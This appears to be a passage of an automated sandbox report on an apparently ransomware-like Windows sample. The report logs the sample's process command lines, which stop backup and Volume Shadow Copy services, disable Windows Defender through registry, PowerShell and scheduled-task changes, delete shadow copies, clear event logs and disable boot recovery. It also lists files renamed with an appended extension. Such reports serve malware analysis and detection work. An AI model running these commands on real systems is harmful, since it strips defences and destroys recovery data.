| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12bb5" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12bb5" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12bb5" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| NL | 8.248.3.254:80 | tcp |
Files
memory/2724-115-0x0000000000000000-mapping.dmp
memory/3244-116-0x0000000000000000-mapping.dmp
memory/3536-117-0x0000000000000000-mapping.dmp
memory/3580-118-0x0000000000000000-mapping.dmp
memory/2420-119-0x0000000000000000-mapping.dmp
memory/3320-120-0x0000000000000000-mapping.dmp
memory/852-121-0x0000000000000000-mapping.dmp
memory/2300-122-0x0000000000000000-mapping.dmp
memory/3588-123-0x0000000000000000-mapping.dmp
memory/3360-124-0x0000000000000000-mapping.dmp
memory/3388-125-0x0000000000000000-mapping.dmp
memory/1812-126-0x0000000000000000-mapping.dmp
memory/3692-127-0x0000000000000000-mapping.dmp
memory/500-128-0x0000000000000000-mapping.dmp
memory/2824-129-0x0000000000000000-mapping.dmp
memory/1160-130-0x0000000000000000-mapping.dmp
memory/2840-131-0x0000000000000000-mapping.dmp
memory/600-132-0x0000000000000000-mapping.dmp
memory/908-133-0x0000000000000000-mapping.dmp
memory/700-134-0x0000000000000000-mapping.dmp
memory/1868-135-0x0000000000000000-mapping.dmp
memory/808-136-0x0000000000000000-mapping.dmp
memory/1544-137-0x0000000000000000-mapping.dmp
memory/2468-138-0x0000000000000000-mapping.dmp
memory/4036-139-0x0000000000000000-mapping.dmp
memory/2436-140-0x0000000000000000-mapping.dmp
memory/1460-141-0x0000000000000000-mapping.dmp
memory/1840-142-0x0000000000000000-mapping.dmp
memory/2044-143-0x0000000000000000-mapping.dmp
memory/2128-144-0x0000000000000000-mapping.dmp
memory/2268-145-0x0000000000000000-mapping.dmp
memory/4024-146-0x0000000000000000-mapping.dmp
memory/2876-147-0x0000000000000000-mapping.dmp
memory/2232-148-0x0000000000000000-mapping.dmp
memory/1424-149-0x0000000000000000-mapping.dmp
memory/3672-150-0x0000000000000000-mapping.dmp
memory/3260-151-0x0000000000000000-mapping.dmp
memory/2184-152-0x0000000000000000-mapping.dmp
memory/1064-153-0x0000000000000000-mapping.dmp
memory/2712-154-0x0000000000000000-mapping.dmp
memory/3016-155-0x0000000000000000-mapping.dmp
memory/3764-156-0x0000000000000000-mapping.dmp
memory/584-157-0x0000000000000000-mapping.dmp
memory/3932-158-0x0000000000000000-mapping.dmp
memory/2012-159-0x0000000000000000-mapping.dmp
memory/1512-160-0x0000000000000000-mapping.dmp
memory/3204-161-0x0000000000000000-mapping.dmp
memory/3100-162-0x0000000000000000-mapping.dmp
memory/3104-163-0x0000000000000000-mapping.dmp
memory/1268-164-0x0000000000000000-mapping.dmp
memory/1316-165-0x0000000000000000-mapping.dmp
memory/600-166-0x0000000000000000-mapping.dmp
memory/1780-167-0x0000000000000000-mapping.dmp
memory/3232-168-0x0000000000000000-mapping.dmp
memory/984-169-0x0000000000000000-mapping.dmp
memory/1276-170-0x0000000000000000-mapping.dmp
memory/1324-171-0x0000000000000000-mapping.dmp
memory/2348-172-0x0000000000000000-mapping.dmp
memory/1872-173-0x0000000000000000-mapping.dmp
memory/2152-174-0x0000000000000000-mapping.dmp
memory/2120-175-0x0000000000000000-mapping.dmp
memory/3024-176-0x0000000000000000-mapping.dmp
memory/2076-177-0x0000000000000000-mapping.dmp
memory/2988-178-0x0000000000000000-mapping.dmp
memory/3516-179-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-180-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-181-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-182-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-183-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-184-0x00000204C8C10000-0x00000204C8C32000-memory.dmp
memory/3516-185-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-186-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-187-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-188-0x00000204CADB0000-0x00000204CAE26000-memory.dmp
memory/3516-189-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-193-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-194-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-203-0x00000204C8CD3000-0x00000204C8CD5000-memory.dmp
memory/3516-205-0x00000204C8CD6000-0x00000204C8CD8000-memory.dmp
memory/3516-202-0x00000204C8CD0000-0x00000204C8CD2000-memory.dmp
memory/3516-217-0x00000204C8CD8000-0x00000204C8CD9000-memory.dmp
memory/3516-218-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
memory/3516-219-0x00000204AEE90000-0x00000204AEE92000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/504-222-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-221-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-223-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-224-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-225-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-226-0x000002AC63680000-0x000002AC636A2000-memory.dmp
memory/504-227-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b542b2f7ad50bfae9c77a70ccb99c9c0 |
| SHA1 | f2bce1dda10cbc4dee0668ce46e690d1244b1cbd |
| SHA256 | ac61d455d56fba36bf0c0e7fc23927e0c76825b86670abe5d3eb295ab36b2810 |
| SHA512 | 5bf10b52890d9161caafc2bbf400322f3d48704969053c91c83bd697bb45cb4e987cfed4398fc7b9423aec7741fbe798cf1d11c1119fc817ef3d9ed0706b6bd9 |
memory/504-229-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-230-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-231-0x000002AC641D0000-0x000002AC64246000-memory.dmp
memory/504-232-0x000002AC48F60000-0x000002AC48F62000-memory.dmp
memory/504-252-0x000002AC49150000-0x000002AC49152000-memory.dmp
memory/504-253-0x000002AC49153000-0x000002AC49155000-memory.dmp
memory/504-254-0x000002AC49156000-0x000002AC49158000-memory.dmp
memory/504-262-0x000002AC49158000-0x000002AC49159000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 16:50
Reported
2022-01-12 16:55
Platform
win7-en-20211208
Max time kernel
122s
Max time network
122s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR32F.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Cjq7i5-85uM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Emf4H2gsN9Y0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_h2gxVkSe8gY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\es-ES\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_qT_6RMGyFS40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WITHCOMP.DPV.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Vc7l7GUTGk40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P__gKENxS6lK80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_P7UElgM63i80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PULQOT98.POC.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_o7j6sCY8xaE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\en-US\jsprofilerui.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02285_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_dPVTZJcQdKI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_K2Um2-Zvk4k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_tCbX-LnIX4k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\IPSEventLogMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_top.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Dmvddsi-j5s0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Xa3rNeMhGos0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_gFp2Lz3D6qc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\settings.html | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_FjrUu8kA9GA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_cRh6jGYF6sI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\logo.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Perspective.eftx.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_DuQa_nCrD7E0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14516_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P__IHG07kjmUw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\InitializeHide.txt.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_jIqAC-agpbw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
